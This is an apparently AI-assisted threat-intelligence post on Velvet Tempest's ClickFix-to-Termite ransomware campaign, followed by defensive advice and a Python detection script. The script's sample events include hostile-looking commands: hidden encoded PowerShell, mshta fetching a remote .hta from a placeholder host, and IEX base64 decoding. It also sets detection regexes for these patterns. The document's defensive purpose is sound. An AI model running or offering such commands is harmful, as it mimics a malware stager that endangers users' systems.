[TIMESTAMP: 2026-03-07 20:09 UTC] [AUTHOR: Runtime Rebel Intel] [SEVERITY: HIGH]

Velvet Tempest Deploys Termite Ransomware via ClickFix and CastleRAT

AI-Assisted Analysis
READ_TIME: 4 min read
// executive briefing tl;dr
  • [01] Velvet Tempest threat actors are compromising enterprise environments by using fake browser update overlays to trick users into executing malicious PowerShell commands.
  • [02] Impacted systems include Windows environments where users have permissions to execute scripts, leading to the deployment of CastleRAT and Termite ransomware.
  • [03] Defenders should implement PowerShell execution policies and monitor for suspicious mshta.exe or certutil.exe activity to disrupt the initial infection vector.

A sophisticated threat actor tracked as Velvet Tempest (also known as Storm-0631) has been observed using a clever social engineering technique to infiltrate corporate networks and deploy Termite ransomware. According to BleepingComputer, this group, previously associated with deploying various malware strains, now uses the ‘ClickFix’ mechanism to gain initial access and then move laterally.

How the ClickFix Social Engineering Mechanism Works

The attack begins when a user visits a compromised website or is redirected there via phishing lures. Instead of a traditional file download, the group employs the ClickFix TTP, which displays a fraudulent overlay designed to look like a browser error or a system troubleshooting prompt. The pop-up informs the victim that a ‘fix’ is required to view the page and instructs them to copy a PowerShell command to their clipboard and execute it manually via the Windows Run dialog (Win+R).

By convincing the user to execute the code themselves, the attackers bypass many EDR protections that primarily focus on automated browser-based downloads. This social engineering tactic shifts the burden of execution to the user, making it harder for automated systems to distinguish between legitimate administrative tasks and malicious activity. Organizations must focus on ClickFix social engineering protection by educating users never to run terminal commands or PowerShell scripts provided by external websites.

Payload Analysis: DonutLoader and CastleRAT

Once the victim executes the obfuscated PowerShell command, it utilizes legitimate Windows binaries such as mshta.exe or certutil.exe to pull down further payloads from C2 infrastructure. One of the primary tools in this stage is DonutLoader, a shellcode injector that allows for the execution of VBScript, JScript, or .NET assemblies in memory without writing files to disk.

DonutLoader is subsequently used to deploy CastleRAT, a remote access trojan that grants Velvet Tempest persistent access to the host. Researchers note that CastleRAT provides extensive capabilities for data exfiltration, system monitoring, and facilitating the deployment of additional tools required for the final stages of the attack. Understanding how to detect CastleRAT malware requires the SOC to monitor for unusual network connections originating from living-off-the-land binaries and unexpected persistence mechanisms in the registry.

From Initial Access to Termite Ransomware

Velvet Tempest does not stop at data collection. After establishing a foothold, the group performs internal reconnaissance to identify high-value targets and backup servers. This lateral movement phase often relies on legitimate tools and compromised credentials to avoid triggering security alerts.

The final objective in the observed campaigns is the deployment of Termite ransomware. This strain is designed to encrypt sensitive data and demand a significant payment for the decryption key. The integration of ClickFix lures with high-impact ransomware highlights the group’s intent to maximize the financial ROI of their operations. This shift suggests that Velvet Tempest may be operating as an APT for financial gain or as an affiliate in a broader ransomware-as-a-service ecosystem.

Velvet Tempest Ransomware Mitigation and Detection Strategies

Defending against these multi-stage attacks requires a layered approach aligned with the MITRE ATT&CK framework. Effective Velvet Tempest ransomware mitigation starts with restricting user permissions and hardening the PowerShell environment.

  • Execution Policies: Enforce ‘AllSigned’ or ‘Restricted’ PowerShell execution policies via Group Policy to prevent the execution of untrusted scripts.
  • Script Block Logging: Enable PowerShell Script Block Logging (Event ID 4104) to provide visibility into the actual commands being executed, even if they are obfuscated.
  • Living-off-the-Land Monitoring: Use SIEM rules to flag instances of mshta.exe or certutil.exe communicating with unknown external IP addresses, as these are frequently used by DonutLoader for payload retrieval.
  • User Training: Conduct simulations focusing on the ClickFix technique to ensure employees recognize that legitimate software updates never require manual command execution in the Windows Run box.
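The monitoring points above (the Run-dialog execution pattern from the ClickFix section, the mshta.exe / certutil.exe payload fetch from the payload section, and the 4104 script block visibility) can be expressed as a small rule set; the following is an added Python example, not code from the article or from any vendor product, run over constructed Sysmon-style process creation events and 4104 script block events. The field names, image paths, placeholder URL and the rule names are assumptions.

```python
import re
from typing import Dict, List

# Constructed sample telemetry (not taken from the article): Sysmon-style process
# creation events (EventID 1) and PowerShell Script Block Logging events (EventID 4104).
# The encoded command in event 0 is a harmless Start-Sleep, included only as a shape.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "1", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -nop -ep bypass -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwAA=="},
    {"EventID": "1", "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://placeholder.invalid/update.hta"},
    {"EventID": "4104",
     "ScriptBlockText": "IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($e)))"},
    {"EventID": "1", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe notes.txt"},
    {"EventID": "1", "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\certutil.exe", "CommandLine": "certutil -verifystore root"},
]

LOLBINS = {"mshta.exe", "certutil.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"} | LOLBINS
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Flags a pasted ClickFix command typically carries: hidden window, no profile,
# bypassed execution policy or an encoded command, on an interactively launched shell.
EVASIVE_FLAGS_RE = re.compile(r"(?i)(-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass|-e(nc|ncodedcommand)?\s)")
# Constructs seen in decoded script blocks when a stage is decoded and run in memory.
SCRIPTBLOCK_RE = re.compile(r"(?i)(FromBase64String|Invoke-Expression|\bIEX\b|DownloadString|Net\.WebClient)")

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules the event matches (empty list if nothing fires)."""
    hits: List[str] = []
    if event["EventID"] == "1":
        image, parent, cmd = basename(event["Image"]), basename(event["ParentImage"]), event["CommandLine"]
        # Rule 1: shell or LOLBin spawned by explorer.exe (the Run dialog's parent) with
        # evasive flags or a URL on the command line: the ClickFix execution pattern.
        if parent == "explorer.exe" and image in SHELLS and (EVASIVE_FLAGS_RE.search(cmd) or URL_RE.search(cmd)):
            hits.append("clickfix_run_dialog_execution")
        # Rule 2: mshta.exe / certutil.exe handed a remote URL, i.e. the stager fetch.
        if image in LOLBINS and URL_RE.search(cmd):
            hits.append("lolbin_remote_payload_fetch")
    elif event["EventID"] == "4104" and SCRIPTBLOCK_RE.search(event.get("ScriptBlockText", "")):
        # Rule 3: 4104 text shows decode-and-execute constructs despite command-line obfuscation.
        hits.append("scriptblock_inmemory_execution")
    return hits

def scan(events: List[Dict[str, str]]) -> List[tuple]:
    """Run every rule over a batch; returns (event index, matched rules) for hits only."""
    return [(i, h) for i, e in enumerate(events) if (h := evaluate(e))]

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(rules)}")
```

Rule 1 deliberately requires explorer.exe as the parent plus an evasive flag or URL, so a user opening PowerShell from the Start menu does not fire it on its own.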
